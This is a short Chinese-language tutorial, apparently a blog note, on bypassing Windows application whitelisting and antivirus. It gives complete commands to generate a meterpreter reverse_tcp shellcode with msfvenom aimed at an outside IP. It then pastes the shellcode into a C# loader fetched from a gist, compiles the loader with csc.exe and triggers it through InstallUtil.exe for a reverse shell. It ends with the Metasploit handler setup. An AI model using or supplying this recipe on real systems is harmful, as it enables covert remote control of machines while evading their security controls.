InstallUtil&csc.exe-bypass application whitelisting

1)通过msfvenom生成C#的shellcode

1
msfvenom -p windows/meterpreter/reverse_tcp lhost=111.111.111.111 lport=4443 -f csharp

2)下载InstallUtil-Shellcode.cs,将上面生成的shellcode复制到该cs文件中

1
2
https://gist.github.com/lithackr/b692378825e15bfad42f78756a5a3260 
InstallUtil-Shellcode-cs

3)csc编译InstallUtil-ShellCode.cs

1
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /unsafe /platform:x86 /out:D:\test\InstallUtil-shell.exe D:\test\InstallUtil-ShellCode.cs

编译生成的文件后缀名无所谓exe dll txt都可以,但只能InstallUtil.exe来触发

4)InstallUtil.exe执行 反弹shell

1
C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U D:\test\InstallUtil-shell.exe

成功bypass av,反弹shell:

补充:MSF开启监听

1
2
3
4
5
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 172.16.0.19
set LPORT 4443
exploit -j

参考:
https://www.blackhillsinfosec.com/how-to-bypass-application-whitelisting-av/